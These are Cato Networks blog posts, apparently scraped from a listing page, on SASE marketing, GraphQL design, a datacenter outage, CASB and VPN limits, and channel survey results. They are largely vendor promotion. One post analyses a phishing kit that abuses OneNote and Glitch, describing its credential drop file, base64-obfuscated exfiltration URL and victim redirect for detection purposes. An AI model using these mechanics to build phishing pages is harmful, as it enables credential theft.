[caption id="attachment_22635" align="alignnone" width="632"] Top 3 techniques based on number of events, excluding scans.[/caption]
But when we looked at the number of total events, we noticed that on average 94% are TTP-based and only 6% are IoC-based, this affirms our TTP-based approach’s effectiveness in focusing on those areas of actual importance to organizations.
TTP: Lets You Focus on Quality Not Chase Quantity
Focusing on TTP-based signatures provides a wide angle of protection against unknown threats, and the potential to block 0-days out of the box. On top of 0-days, these signatures cover past threats just as well, giving us a much greater ratio of threats covered per signature.
The IoC-based approach is less valuable, identifying fewer threats confronting today’s enterprises. TTP-based signatures prove to save production time by having a better protection for less effort and giving us more confidence in our coverage of the ATT&CK Matrix.
What’s more, when covering IoC-based signatures, the focus is on the number of signatures, which does not necessarily result in better security and might even lead to a false sense of one. The bottom line is that one good TTP-based signature can replace 100 IoC-based ones, allowing enterprises to focus on quality of protection without having to chase quantity of threats.
A short story that doesn’t have to be yours Prologue You’re the captain of a massive container ship filled with servers, hard drives, and mounting...
If Only Kodak and Nokia Resellers Had Known A short story that doesn’t have to be yours
Prologue
You’re the captain of a massive container ship filled with servers, hard drives, and mounting racks, making its way through stormy waters. The heavy cargo makes it hard for the ship to float and for you to navigate it safely to its destination. Suddenly, you notice a huge boulder ahead. You try to steer away, but the heavy cargo makes it difficult, and it seems like impact is inevitable. As you sound the alarm, you jump into action without wasting a second and start packing your single lifeboat with all the appliances you can get your hands on. Your team looks at you scared and puzzled, but you’re positive you can save everything; yourself, your team, and all the appliances ignoring the fact that they were the ones that led to the collision in the first place.
Dramatic? Yes. Ridiculous? Not really
You’re likely facing this dilemma while reading this blog post. Will you act differently?
A good 50-90% of your revenue comes from reselling appliance-based point solutions. You’re operating on slim margins, and it’s becoming more and more challenging to differentiate yourself and explain the value you bring to your customers. You find it hard to hire top engineers and sales professionals because they’re busy selling cloud solutions and future-proofing their careers.
You see the storm waves rising. You feel the steering wheel getting heavier by the minute.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=what_others_wont_tell_you"] What Others Won’t Tell You About MPLS | Get The eBook [/boxlink]
Let’s pause here and look at the facts
On November 16th, 2021, Riverbed Technology announced filing for Chapter 11 Bankruptcy. Check Point Software Technologies was recently pushed out of the Nasdaq 100 Index. These events happen while the network security business is skyrocketing, and the competitors are reaching an all-time high in market valuation and revenue growth. What do these companies have in common? First, they never really embraced the convergence of networking and network security. Secondly, their solutions are not cloud-delivered as a service but are still heavily dependent on edge appliances, physical or virtual. While most other pure SD-WAN and network acceleration companies were acquired (VeloCloud by VMware, CloudGenix by PAN, Viptela by Cisco) as a part of a SASE play, Riverbed stood by itself as an appliance-based point solution company. While most leading security vendors made aggressive moves towards SASE convergence or integration onto the cloud (PAN, Fortinet, VMware, Cisco), Check Point stayed away from networking and was late to launch cloud-delivered solutions.
These are all obvious indications, warning signs, if you will, of a fundamental shift in IT architectures. Ignoring these signs is equivalent to loading your lifeboat with appliances while riding 100 feet waves. You, as a reseller or a service provider, can’t save yesterday’s technology. Evolving is no longer the privilege of the brave and innovative but necessary for any business looking to remain relevant.
You can choose how your business story unfolds. Consider the following one.
A day in the life of a cloud-native SASE reseller
Resellers and service providers of cloud-native SASE solutions help their customers transform their networks into agile, flexible, and maintenance-free environments. They bring to the table a highly differentiated offering that enterprise customers going through digital transformation deeply appreciate.
These partners generate recurring revenues that future-proof their financials. They enjoy the rewards of buying a managed service just like you recommend to your customers. Their SASE Cloud provider takes care of the network, hires the right personnel, maintains, patches, and updates everything according to the industry’s best practices. The provider releases new features and capabilities that are available to their customers at the flip of a switch and is accountable for all the network and security components of its service. These SASE partners have ‘one throat to choke’ and benefit from unmatched SLA.
On their SASE deals, SASE partners make high margins and add their professional and managed services on top for even more attractive blended margins.
Their employees master modern technologies, taking pride in driving this revolution rather than trying to convince everyone, themselves included, that nothing is changing.
And their customers? They will never go back to appliance-based solutions. Thanks to their trusted partners, they now enjoy a scalable and resilient cloud-native network and a full security stack delivered as a cloud service. They are becoming SASE experts and thought leaders, and some of them even started their own blogs.
But most importantly, they weathered the storm. Their ships are safe, and so is everyone on them.
The Way Forward: How to Win in a Changing Business Environment
Cloud-delivered solutions are winning. Cloud datacenters replace the world’s on-premises data centers. Cloud application replaced most of our on-prem applications. The 2019 COVID outbreak accelerated cloud and SASE adoption, as enterprises moved to work-from-anywhere.
The SASE revolution is here, as defined by the world’s leading analysts, changing networking and network security for good. 2022-2025 is the transition period to mainstream adoption of SASE among enterprise customers 1
Our music is in the cloud. No more CDs. MP3 players are no longer needed. We have smartphones. Cloud and convergence are revolutionizing the way we use technology. Why would network and network security be any different? They are not. These shifts in the market don’t happen overnight. Business managers that recognize them, must adapt to ensure the relevancy and profitability of their companies.
Not all appliances will disappear. Some customers, in some cases, will still choose them. But, they represent the past. In the same way that CDs, Kodak films, and Nokia (not so smart) phones are still available, edge appliances will stick around. But do you want your business to be recognized by these legacy solutions? Do you want their success or failure to determine yours?
Be brave enough to write your own story.
1 Gartner, “Hype Cycle for Enterprise Networking ” Andrew Lerner. October 11, 2021
GARTNER is registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.
In the server team at Cato Networks, we are responsible for building the web console for network and security configuration. Cato Networks is currently experiencing...
How Schema-First approach creates better API, reduces boilerplate and eliminates human error In the server team at Cato Networks, we are responsible for building the web console for network and security configuration. Cato Networks is currently experiencing rapid growth in which bigger customers require control over the Cato API and the old solutions, that were built quickly can no longer stand the scale. Obviously, in tandem the development teams are also growing rapidly.
All this led us to decide to move from a large and complex json over http API, which was only used by our UI, to a public graphQL API that is exposed to customer use, while still serving our web application.
We needed to choose the development approach for the API. Use code as a single source of truth and have schema as an artifact generated from the code (aka. Code-First approach), or create a schema and implement code to match its definitions (aka. Schema-First approach).
We decided to go Schema-First, and in this post I’d like to explain why.
FOCUS
When API development starts from writing the code, it is hard to stay focused on its structure, consistency, and usability. On the other hand, when development starts from describing the API in the schema, while abstracting from the actual implementation, it creates clear focus.
You also have the entire schema in front of your eyes, and not scattered through the codebase, which helps to keep it consistent and well organized.
[boxlink link="https://www.catonetworks.com/resources/management-application-walkthrough/?utm_source=blog&utm_medium=top_cta&utm_campaign=management_demo"] Cato Management Application | 30 min Walkthrough [/boxlink]
INTERFACE
We treat our schema as an interface between front and back, which is visible and clear to both sides. After agreeing on a schema, code on both ends can be written in parallel, without worrying about misaligned bridge situations:
DECOUPLING
When working with a Code-First approach there is a backend-frontend dependency. Code is required to be written at the backend first, so the schema can be generated from it, slowing down the frontend development, and leading to slower schema evolution.
In contrast, there is no dependency on the backend team when working Schema-First. No need to wait for any code to be written (and schema to be generated from it). Schema modifications are fast and the development cycle is shortened.
CODE-GEN
After designing the schema, it is easy to start implementing it, building from a generated code both on frontend and backend. We hooked code-gen in our build process, and were getting server stubs that are perfectly aligned with schema in terms of arguments, return types, and routing rules. The only thing that is left to be done is writing actual business logic.
There is no need to worry that your server-side code diverges from schema, because upon any change to schema, code is re-generated and you can spot the problem early, at compile time.
Things are even better at the client side. There are tools that allow you to generate a fully functional client library from the schema. We use Apollo's official codegen tool for this purpose. Getting data from the server became a no-brainer, just calling a method on a generated client library that we spend zero effort creating.
BEING DECLARATIVE
GraphQL allows you to create custom directives and handlers for them. We utilized this to cut the security and validation concerns from the query resolvers code and centralized them, declaratively, inside the schema.
For example, we have @requireAuth directive that can be set on a type, field or argument to define that this is a restricted part of the API.
Here are some self-explanatory examples of our custom-built validation directives:
@stringValue(regex:String, maxLength:Int, minLength:Int, oneOf: [String!])
@numberValue(max:Int, min:Int, oneOf: [Int!])
@email
@date(format:String,future:Boolean)
This not only reduces the code on the server side, but also gives some hints to the frontend, in terms of validations that need to be implemented to eliminate unnecessary roundtrips of not valid inputs.
SUMMARY
Almost all of the points described here apply not only for graphQL API, but to any schema-based API, like OpenAPI (aka. Swagger) for json over HTTP or gRPC.
In any case Schema-First or Code-First is a decision that must be made on a per project basis, taking into consideration its specifics and needs. I do hope I've managed to encourage you to at least give a Schema-First approach a chance.
The strength of any network is its resiliency—its ability to withstand disruptions that might otherwise cause a failure somewhere in the connectivity. The Cato Cloud...
Cato Resiliency: An Insider’s Look at Overcoming the Interxion Datacenter Outage The strength of any network is its resiliency—its ability to withstand disruptions that might otherwise cause a failure somewhere in the connectivity. The Cato Cloud service proved its resiliency during the massive hours-long service outage of the LON1 Interxion data center at its central London campus on January 10.
Interxion suffered a catastrophic loss of power beginning just before 18:00 UTC on a Monday evening. The failure cut out multiple power feeds going into the building, and equipment designed to switch to backup generator power also failed. The result was complete loss of power leading to service outages for numerous customers dependent on this particular data center. Hundreds of companies were impacted with the London Metal Exchange, for example becoming unavailable for nearly five hours.
Cato customers were also impacted by this outage – for a few seconds. For the benefit of proximity to the financial and technology hubs near Shoreditch, Cato has a PoP in this Interxion datacenter. That means that Cato’s customers, too, were affected by the sudden unavailability of our PoP. However, most customers suffered few repercussions as their traffic was automatically moved over to another nearby Cato PoP for continued operation. The transfer took place within seconds of the LON1 power failure, and I’d venture a guess that few Cato customers even noticed the switch-over.
To a network operator, this is a true test of both resiliency and scale.
[boxlink link="https://www.catonetworks.com/resources/tls-decryption-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=tls_demo"] Cato Demo | TLS Inspection in Minutes [/boxlink]
Cato’s Response to the Outage Was Both Immediate and Automatic
On January 10 at 17:58 UTC, we started to receive Severity-1 alerts about our London PoP. The alerts indicated that all our machines in London were down. We were unable to access our hardware with any of our carriers.
Calling Interxion proved impossible. Only later did we learn that the power outage that took down the datacenter also disrupted their communications. The same was true for opening a support ticket; it too elicited no response. Checking Twitter showed different complaints about the same thing. Despite having no word directly from Interxion, we understood there was a catastrophic power failure. We incident to our customer about 10 minutes after it started on our status page -- official reports would only be received several hours later.
As for the impact on SASE availability, every Cato customer sending traffic through this London PoP using a Cato Socket (Cato’s Edge SD-WAN device) had already been switched over within seconds of the power outage to a different PoP location. They were humming away as if nothing had happened.
Most customers had their traffic routed to Manchester instead of London. Our PoPs have been designed with surplus capacity precisely for these reasons. You can see from the chart below that our Manchester PoP saw a sudden increase in tunnels coming in, and we were able to accommodate the higher traffic load without a problem. This demonstrates both the resiliency and the scale of Cato’s backbone network.
[caption id="attachment_22306" align="alignnone" width="2746"] This graph shows how the number of tunnels at Cato’s Manchester PoP suddenly quadrupled at 18:00 UTC on January 10, 2022, as users automatically switched over from our London PoP due to the Interxion outage. [/caption]
There were a few exceptions to the quick transition from the London PoP to another. Some Cato customers, for whatever reason, choose to use a firewall to route traffic rather than a Cato Socket. In this case, they create a tunnel using IPsec to a specific PoP location. Cato recommends – and certainly best practices dictate – that the customer create two IPsec links, each one going to a different location. In this case, one link operates as a failover alternative to the other.
We had a handful of customers using firewall configurations with two tunnels going only to the London site. When London went down, so did their network connections—both of them. We could see on our dashboard exactly which customers were affected in this way and reached out to them to configure another tunnel to a location such as Manchester or Amsterdam. Here’s a comment from one such customer:
“When dealing with the worst possible situation and outage, you have provided excellent support and communications, and I am grateful.”
Lessons We Took Away from This Incident
At Cato, we view every incident as an opportunity to strengthen our service for the next inevitable event. We think about rare case scenarios that can happen and run retrospective meetings from which we identify the next actions that need to be taken to ensure the resiliency of our solution.
When we built a service with an SLA of five 9’s this is the commitment we made to our customers. When we carry their traffic, we know that every second counts. This requires ongoing investments and thinking about how things could go wrong and what we have to do to ensure that our service will be up. Part of that is what drives our continued investment in opening new PoPs across the globe and often within the existing countries. The density of coverage, not just the number of countries, is important when considering the resiliency of a SASE service.
Who would ever have thought that a major datacenter in the heart of London would lose access to every power source it has? Well, Cato considered such a scenario and prepared for it, and I’m pleased to say that this unexpected test showed our service has the resiliency and scale to continue as our customers expect it to.
There’s An App for That What used to be a catchphrase in the world of smartphones, “There’s an app for that”, has become a reality...
Here’s Why You Don’t Have a CASB Yet There's An App for That
What used to be a catchphrase in the world of smartphones, "There's an app for that", has become a reality for enterprise applications as well. Cloud-based Software as a Service (SaaS) applications are available to cater for nearly every aspect of an organization's needs. Whichever task an enterprise is looking to accomplish - there's a SaaS for that.
On the flip side, the pervasiveness of SaaS has enabled employees to adopt and consume SaaS applications on their own, without IT's involvement, knowledge, nor consent. While CASB solutions, which help enterprises cope with shadow IT, have been around for quite a while, their adoption has been relatively limited and mostly on the larger end of the enterprise spectrum. As the shift to cloud trend has been adopted by nearly all enterprises of all sizes, and the need for a solution such as CASB being so evident, the question remains why are we not seeing greater adoption? Here are a few common objections:
It's too complex to deploy and run
Deploying a stand-alone CASB solution is no trivial feat. It requires extensive planning and mapping of all endpoints and network entities from which information needs to be collected. It also requires continuous deployment and updating of PAC files and network collector agents. There is also typically a need to modify the network topology to allow cloud-bound data to pass through the CASB service.
It adds network latency
CASB processing in inline deployment mode can add significant network latency. When there is a need to decrypt traffic in order to apply granular access rules, there is additional latency due to encryption/decryption processing. Adding a CASB service to your traffic flow often means adding an additional network hop adding more latency still.
It requires domain expertise
While operating a CASB solution isn't rocket science, it still requires a fair amount of knowledge and experience to implement correctly and ensure cloud assets and users are protected effectively. Many IT teams lack the resources and expertise to manage a CASB and simply pass on it.
I don't see the need for CASB
This objection comes up more often than one might think. In many cases it is raised by IT managers who believe their SaaS usage is minimal and in check. To understand the full extent of an organization's SaaS usage, there is a need for a CASB shadow IT report. But the report is available only after the CASB has been deployed. This deadlock often hinders enterprises from seeing the value and importance of CASB.
[boxlink link="https://www.catonetworks.com/resources/cato-casb-overview?utm_source=blog&utm_medium=top_cta&utm_campaign=casb_wp"] Cato CASB overview | Read the eBook [/boxlink]
Keep It Simple CASB
While CASB is undoubtedly an essential component for any modern digital enterprise, the abovementioned concerns are causing many IT leaders to keep their CASB aspirations at bay.
But what if we could make all of these hurdles go away? What if there was a CASB solution that takes away the deployment complexity, eliminates network latency, reduces the required expertise, and enables any IT manager complete insight into their SaaS usage without needing to invest time, effort or cost whatsoever?
This may sound too good to be true, but when we deploy CASB as part of true SASE cloud service, we are able to achieve this and bring CASB within reach of any enterprise.
But what does "true SASE" mean? And how does it help deliver on these promises?
True SASE means all edges. A true SASE solution processes all enterprise network traffic, this includes both on-site and remote users. Since all traffic passes through the SASE service, there is no need to plan or deploy PAC files, agents, or collectors of any kind. All the information the CASB needs is already available.
True SASE means single pass processing. A true cloud-native SASE service executes networking and security services in parallel as opposed to sequential service chaining. This means no additional latency is added by enabling the CASB service.
True SASE means unified management. A true SASE solution enables management and visibility of all networking and security services in a single-pane-of-glass management console. As all network edges, users, and applications are already defined in the system, adding CASB involves minimal additional configuration and ensures simple and fast ramp up.
True SASE means convergence. A true SASE solution fully converges CASB as part of the SASE software stack and enables it complete visibility of all cloud-bound traffic, without the need for any additional deployment or configuration. This enables any enterprise employing SASE to try CASB and view a full shadow IT report instantly, without effort, cost or commitment.
Cato's SASE cloud is a true SASE service. It covers all edges, it is implemented as a Single Pass Cloud Engine (SPACE), uses a unified, single-pane-of-glass management system for all services, and fully converges all networking and security services into a single software stack. As a result, Cato is offering today a "CASB Zero" solution that requires zero planning and zero deployment, adds zero latency, requires zero domain expertise, and enables a zero friction and zero commitment PoC to any Cato SASE customer. Cato CASB - zero reason not to give it a try.
The COVID-19 pandemic drove rapid, widespread adoption of remote work. Just a few years ago, many organizations considered remote work inefficient or completely impossible for...
Moving Beyond Remote Access VPNs The COVID-19 pandemic drove rapid, widespread adoption of remote work. Just a few years ago, many organizations considered remote work inefficient or completely impossible for their industry and business. With the pandemic, remote work was proven to not only work but work well. However, this rapid shift to remote work left little time to redesign and invest in remote work infrastructure and raised serious information security concerns. As a result, many companies attempted to meet the needs of their remote workforce via remote access VPNs with varying levels of success.
What is a Remote Access VPN and How Does it Work?
A remote access virtual private network (VPN) is a solution designed to securely connect a remote user to the enterprise network. A remote access VPN creates an encrypted tunnel between a remote worker and the enterprise network. This allows traffic to be sent securely between these parties over untrusted public networks.
VPNs in general are designed to create an encrypted tunnel between two points. Before sending any data over the connection, the two VPN endpoints perform a handshake that allows them to securely generate a shared secret key. Each endpoint of the VPN connection will use this shared encryption key to encrypt the traffic sent to the other endpoint and decrypt traffic sent to them. This creates the VPN tunnel that allows traffic to be sent over a public network without the risk of eavesdropping.
In the case of a remote access VPN, one end of the VPN connection is a VPN appliance or concentrator on the enterprise network and the other is a remote worker’s computer. Both sides will perform the handshake and handle the encryption and decryption of all data on the VPN connection, and a user will have access to resources similar to if they were in the office.
Why Companies Need to Move Beyond Remote Access VPNs
The reason why Remote access VPNs were widely adopted in the wake of COVID-19 was because companies had existing VPN infrastructure and were simply comfortable with the technology. However, these VPN solutions have numerous limitations, including:
Continuous Usage: Corporate VPN infrastructure was originally designed to occasionally connect a small percentage of the workforce to the enterprise network and resources. With the need to support continuous remote work for most or all of the organization’s employees, remote access VPNs no longer meet business requirements.
Limited Scalability of VPNs: Existing VPN infrastructure was not built to support the entire workforce, making it necessary to scale to meet demand. Attempting to solve this issue using additional VPN appliances or concentrators increases the complexity of the enterprise network and requires additional investment in security appliances as well.
Lack of Integrated Security: A remote access VPN is designed to provide an encrypted connection between a remote worker and enterprise systems. It does not include the enterprise-grade security inspection and monitoring that is necessary to protect against modern cyber threats. Relying on remote access VPNs forces companies to invest in additional, standalone security solutions to secure their VPN infrastructure.
Security Granularity: A remote access VPN provides access similar to a direct connection to the enterprise network. These VPNs provide unrestricted access to enterprise resources in violation of the principles of least privilege and zero-trust security. As a result, a compromised account can provide an attacker with far-reaching access and enables the unrestricted spread of malware.
Performance and Availability: VPN traffic travels over the public Internet, meaning that its performance and availability depend on that of the underlying Internet. Packet loss and jitter are common on the Internet, and latency and availability issues can have a significant impact on the productivity of a remote workforce reliant on remote VPNs for connectivity.
Geographic Limitations: VPNs are designed to provide point-to-point connectivity between two locations. As companies become more distributed and reliant on cloud-based infrastructure, using VPNs for remote access creates complex VPN infrastructure or inefficient traffic routing.
Remote access VPNs were a workable secure remote access solution when a small number of employees required occasional remote connectivity to the enterprise network. As telework becomes widespread and corporate networks become more complex, remote access VPNs no longer meet enterprise needs.
Enterprise Solutions for Secure Remote Access
VPNs are the oldest and best-known solution for secure remote access, but this certainly doesn’t mean that they are the best available solution. The numerous limitations and disadvantages of VPNs make them ill-suited to the modern, distributed enterprise that needs to support a mostly or wholly remote workforce.
Today, VPNs are not the only option for enterprise secure remote access. Gartner has coined the term Secure Access Service Edge (SASE) to describe cloud-native solutions that integrate SD-WAN functionality with a full security stack.
Zero trust network access (ZTNA) is one of the security solutions integrated into SASE and serves as a superior alternative to the remote access VPN. Some of the advantages of replacing remote access VPNs with SASE include:
Scalability and Flexibility: SASE is built using a network of geographically distributed, cloud-based Points of Presence (PoPs). This enables the SASE network to seamlessly scale to meet demand without the need to deploy additional VPN and security appliances.
Availability and Redundancy: SASE nodes are built to be redundant and to identify the best available path to traffic’s destination. This offers much higher availability and resiliency and eliminates the single points of failure of VPN-based remote access infrastructure.
Private Backbone: SASE PoPs are connected via a secure private backbone. This enables it to provide performance and availability guarantees that are not possible for Internet-based VPNs.
Integrated Security: In addition to ZTNA, which enforces zero-trust access controls, SASE PoPs integrate a full stack of network security solutions. This enables them to provide enterprise-grade security without the need for additional standalone security solutions, inefficient routing, or security chokepoints.
If you’re looking to deploy or upgrade your organization’s secure remote access infrastructure, a remote access VPN is likely not the right answer. Cato’s SASE-based remote access service provides all of the benefits of a VPN with none of the downsides. To learn more about SASE and how it can work for your business, contact us here.
Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows...
Analysis of Phishing Kill Chain Identifies Emerging Technique That Exploits Trust in Your Collaboration Platforms Think of phishing and most people will think of cleverly crafted emails designed to get you to click on malicious links. But new research shows that increasingly attackers are turning to seemingly legitimate and implicitly trusted collaboration tools to penetrate enterprise defenses. Here's what they're doing and how you (or your security vendor) can detect and stop these attacks.
Phishing Attacks Tap Collaboration Platforms
Phishing continues to be one of the most dangerous threats to organizations as an initial vector to infiltrate the network organization or to steal organization credentials. We see, on average, 8,000 entrances to phishing sites per month, all of which are blocked or logged by the Cato SASE Cloud (Figure 1).
[caption id="attachment_22118" align="alignnone" width="568"] Figure 1 – On average, we’re seeing 8,000 entrances to phishing sites per month[/caption]
The bulk of phishing attacks typically rely on email domains such as Gmail to make it appear to unsuspecting victims that they are just receiving one more innocuous message from a trusted domain. But increasingly, we’re seeing the use of compromised accounts such as Microsoft “OneNote” and “ClickUp” to distribute URLs that are actually phishing attacks. Collaboration platforms have, in effect, become another vehicle for distributing malware.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | Get the eBook [/boxlink]
Staying Under the Radar
The delivery stage of such an attack starts with an email from a compromised email account in one organization, usually a known partner, that doesn’t attract suspicion. The use of a real email account makes the phishing attack appear to be a legitimate email. Unfortunately, the email is anything but legitimate. It typically contains some social-engineering script with a link to a compromised “OneNote” or “ClickUp” account that makes it challenging to detect. In the case illustrated below, the “OneNote” account even contains a “look-alike” file that is an image resource with a link that redirects the phishing victim to what appears to be the Office 365 landing page. The OneNote account is even designed to be replaced by other compromised accounts if the account being used is reset.
[caption id="attachment_22092" align="alignnone" width="724"] Figure 2 – The overall phishing attack flow starts with an “innocent” email (1) linking to a compromised account (2), such as OneNote, which redirects the victim to what looks like an Office 365 login page(3). [/caption]
It turns out phishing attack is also hosted on a legitimate service called “Glitch” that is typically used for web development. The cybercriminals in this example made sure the attack would go undetected from delivery all the way to the final landing page by most of the security tools organizations commonly employ.
Phishing Kit Anatomy
These attacks are also unique in that once credentials are submitted, the victim’s data is being sent using HTTP-POST to the “drop URL” that is placed in a remote server. In most of the attacks that we’ve analyzed, the most common PHP remote drop file name was named next.php or n.php.
Fortunately, many of the perpetrators of these attacks don’t remove the phishing kit from the attack’s web server. By probing the site, you may find the phishing kit placed within the site such as the Office 365 example below:
[caption id="attachment_22094" align="alignnone" width="2064"] Figure 3– Open directory listing contains phishing kit [/caption]
This analysis makes it then possible to identify characteristics of the phishing kit that can be used to find new ways to block phishing domains that now routinely include collaboration platforms.
Phishing Kit Code Analysis
Going deeper, we also dissected some of the kit to uncover a few interesting pieces of code that are worth noting.
For example, we can see the email that is used to receive the victim information (see Figure 8.). Usually, phishing kits are sold on the Darknet for relatively low prices. Looking at the analyzed PHP code snippet of the phishing kit (Figure 8), the “$recipient” variable should be filled by the buyer's drop email to capture the compromised credentials. However, the comment “Put your email address here” also make it easy for even someone with no coding skills to configure the attack settings.
[caption id="attachment_22096" align="alignnone" width="1088"] Figure 4 – phishing kit code settings[/caption]
In addition, we can see the $finish_url variable is set to Office’s o365. That means once the credentials are submitted the victim will be redirected to the official O365 website, so they don’t suspect that he was a victim of a phishing scam.
Another interesting element is the validation of the authentication. If the authentication is validated then the victim information will be encoded with bas64 and sent to a specific chosen URL. The URL is encoded in base64 to obfuscate the URL destination (inside the function base64_decode). The purpose of this URL is to be used as a DB file with all the victim’s information.
[caption id="attachment_22098" align="alignnone" width="2456"] Figure 5 – Authentication code snippet[/caption]
As can be shown in the snippet (Figure 8) the information that the phishing scam exfiltrated is not only the credentials of the victim but also additional information such as client IP, country, region, and city.
[caption id="attachment_22100" align="alignnone" width="2406"] Figure 6 – Exfiltrated information[/caption]
We have also analyzed domains that use the same phishing kit so we can see a few network characteristics that can be used to block this campaign.
For example, once you submit the credentials you receive the following response from the server {"signal":"ok","msg":"InValid Credentials"}. We have observed similar responses received from different phishing domains that use the same kit. This behavior can be used to detect a user that inserted information required by the phishing attack.
Attackers Are Able to Evade Phishing Solutions
While there are many solutions for detecting phishing, we still see adversaries finding new techniques to evade them. The use of trusted collaboration platforms is more much insidious than the familiar email-based attack that most security teams already know how to counter. However, it’s also apparent that by examining code and network attributes, IT teams can detect and stop these attacks.
Our recent survey Security or Performance: How do you Prioritize? has a lot to say about what enterprise IT leaders value vis-à-vis the tradeoffs between network...
Channel Partners Favor Scale and Deliverability Over Product Margins, Finds Cato Survey Our recent survey Security or Performance: How do you Prioritize? has a lot to say about what enterprise IT leaders value vis-à-vis the tradeoffs between network performance and security effectiveness. But as a channel guy, what I found particularly interesting were the insights the survey offered about the channel.
Along with the 2045 IT leaders, the survey canvassed nearly 1,000 channel partners across the globe about their top security partner considerations. Partners covered the spectrum including resellers, MSP, agents, and master agents across the Americas (33%), EMEA (26%), and APAC (41%). Only a handful of them worked with Cato, providing us deep insight into the overall channel industry.
What we found was surprising and should help inform the strategic direction of any IT service provider or reseller.
Delivering Appliances Has Become Risky Business
You might think that money talks, and so product margins and wealth of services would be the channel’s top considerations, but our survey tells a different story. Far more important than a product’s margins, is the complexity of bringing that product to market. Product margins came in 8th overall when we asked respondents about their priorities when evaluating security vendors. Scalability, ease of management, ease of integration, and the ability to deliver as service were all ranked higher, regardless if you’re speaking about agents and master agents or VARs, MSPs, SIs, or ISPs.
Another way to put that is that the overhead of delivering appliances often outweigh the margins in selling them. This just one indicator that the business argument for network appliances is being called into question.
Appliances have always been about facilitating access to the datacenter, but over 70% of respondents agree or strongly agree that the datacenter is no longer the center of data and that most applications and data reside elsewhere.
Furthermore, security appliances themselves are proving to be a source of security vulnerabilities, which creates brand and customer relationship problems for the partners delivering those products. As Cato’s director of security, Elad Menahem, explained back in October, security advisories published by Cisco Security revealed several significant vulnerabilities in Cisco IOS and IOS XE software. Nor is Cisco alone. Having to drop everything and patch appliances has become all too common, pointed out Peter Lee, security engineer at Cato last fall. No wonder that 80% of respondents agree or strongly agree that for mid-size enterprises, SASE offers better security as it’s easier to manage and allows full visibility into network traffic.
It should also come as no surprise then that over 60% of respondents agree or strongly agree that reselling security appliances has become a risky business. The question is, what’s the alternative?
[boxlink link="https://www.catonetworks.com/resources/8-sase-drivers-for-modern-enterprises/?utm_source=blog&utm_medium=top_cta&utm_campaign=8_sase_drivers"] 8 SASE Drivers for Modern Enterprises | Get the eBook [/boxlink]
SASE Cloud Addresses Appliance Limitations
Again, looking at the priorities for the channel -- scalability, ease of management, ease of integration, the ability to deliver as service, and time to market – are all attributes of the cloud. It becomes much easier to profit from offering cloud services. Delivering security and networking capabilities as cloud services then is increasingly important to partners not only because of the impact it has on the customer’s business but because of the impact it has on their business.
At Cato, I’ve seen that firsthand. The Cato SASE Cloud is a single vendor, cloud-native SASE solution. Our onboarding time for partners is just 4-6 weeks. What’s more the service is always update, managed and protected by our operations and security teams. If you’ve delivered security appliances at all you’ll know how remarkable that is. Having come from a security appliance vendor, I can tell you that onboarding time typically takes many months and requires massive upfront investment.
But frankly, the short time to market and easy adoption of a cloud-native SASE platform, like Cato SASE Cloud, is unusual for SASE solutions today. That’s because many vendors rebrand legacy appliances as SASE portfolios. What’s needed, as Gartner points out, is a SASE platform. (Follow the link for detailed differentiation between SASE platforms and SASE portfolios.) It’s little wonder then that when we asked respondents how long should channel partners would require to build a full SASE offering, only 17% assessed that it should take less than two months. By contrast, nearly half (44%) estimated that it should take up to a year, and 39% estimated that it should take more than a year.
Still, with the easy delivery of SASE platforms, the security improvements SASE brings to the enterprise, and the ability to deliver and manage the complete range of enterprises security and networking services from a single solution, the vast majority of respondents (84%) believe that SASE will become the preferred choice among customers. Over 70% of respondents agree or strongly agree that customers are already looking into SASE to simplify their network and lower TCO (total cost of ownership).
It should be no surprise that most channel partners have adopted (59%) or are looking to offer their customers a SASE solution (31%) Only 10% of respondents have no plans to offer SASE anytime soon.
To learn more about Cato and its partner program, visit https://www.catonetworks.com/partners/
Survey Reveals Confusion about the Promise of SASE Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with...
Security or Performance Survey Reveals Confusion about the Promise of SASE
Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to – choose between security and performance.
Nothing too earth-shattering there; Gartner and other industry leaders have long reached the conclusion that Secure Access Service Edge (SASE) is the suitable network to support both security and performance needs of the digital business. So, unless using SASE, enterprises would inevitably end up having to compromise between the two.
But here’s what is shattering (and particularly confusing): Albeit the fact that the essence of SASE is never having to choose between security and performance; the 8.5% of respondents already using non-Cato’s SASE revealed an unavoidable need to compromise between them – similar to non-SASE users.
Why the Confusion?
We believe this confusion is due to vendors claiming to provide a SASE platform, where in reality they’re merely offering a portfolio of point solutions, packaged into what they misleadingly call SASE. This state was anticipated by Gartner with an explicit warning that “vendor hype complicates the understanding of the SASE market.”1
A true SASE solution – one that supports both security and performance requirements – must converge SD-WAN and cloud-native security services (FWaaS, SWG, CASB, SDP/ZTNA) in a unified software stack with single-pass processing. This approach boosts performance, increases security, and reduces overall network complexity. Deploying point-solutions patched together from so-called SASE vendors, doesn’t add up to a real SASE service. This can’t offer the enhanced security and optimized performance of a converged platform. Yet, this is the SASE service respondents know, hence their confusion is apparent across the survey.
For example, when asked how they react to performance issues with cloud applications, reactions of SASE and non-SASE users were similar. 67% of SASE users would add bandwidth, and 61% of non-SASE users claimed the same. 19% of SASE users would buy a WAN optimization appliance, as 21% of non-SASE users indicated as well.
Evidently SASE users are still suffering from performance issues, and they are forced to add point solutions accordingly. This slows down performance and makes their network more complex and less secure.
Confusion on this topic was even more noticeable among SASE users, where 14% (compared to 9% among non-SASE users) admitted they simply don’t know what to do in case of performance issues. Here are some examples of answers: “Ignore and pray it goes away,” “wait it out – ugh,” “suffer through it,” “don’t know,” and “not sure.”
